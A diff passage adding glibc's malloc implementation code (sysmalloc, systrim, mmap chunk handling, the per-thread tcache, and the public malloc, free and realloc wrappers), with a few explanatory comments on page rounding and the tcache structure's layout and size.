+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
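+      /* Example of the rounding, assuming 4 KiB pages: for a padded request
+         nb == 0x20010, the MALLOC_ALIGNMENT == 2 * SIZE_SZ branch above
+         yields size == ALIGN_UP (0x20010 + 8, 0x1000) == 0x21000, i.e. one
+         extra SIZE_SZ of overhead rounded up to whole pages.  */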
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
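+
+/* Size note (64-bit, with TCACHE_MAX_BINS == 64 as noted earlier): the
+   struct above is 64 one-byte counts plus 64 eight-byte pointers, i.e.
+   576 bytes.  tcache_init below allocates it with _int_malloc, so it is
+   typically the first chunk created on the main thread's heap, with chunk
+   size 0x250 (request2size (576)).  */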
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] != NULL);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
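+
+/* How the two helpers above line up with a chunk: tcache_entry overlays the
+   chunk's user data, so "next" occupies the same words a free chunk would
+   use for fd, and "key" the words it would use for bk.  tcache_put records
+   the owning tcache in key, which is what lets _int_free (later in this
+   file) spot most double frees of tcache-resident chunks; tcache_get
+   clears key and pops entries LIFO, so the most recently freed chunk of a
+   size class is handed back first.  Per-bin occupancy is capped by
+   mp_.tcache_count (7 by default, as noted above).  */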
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* _int_free also calls request2size; be careful not to pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
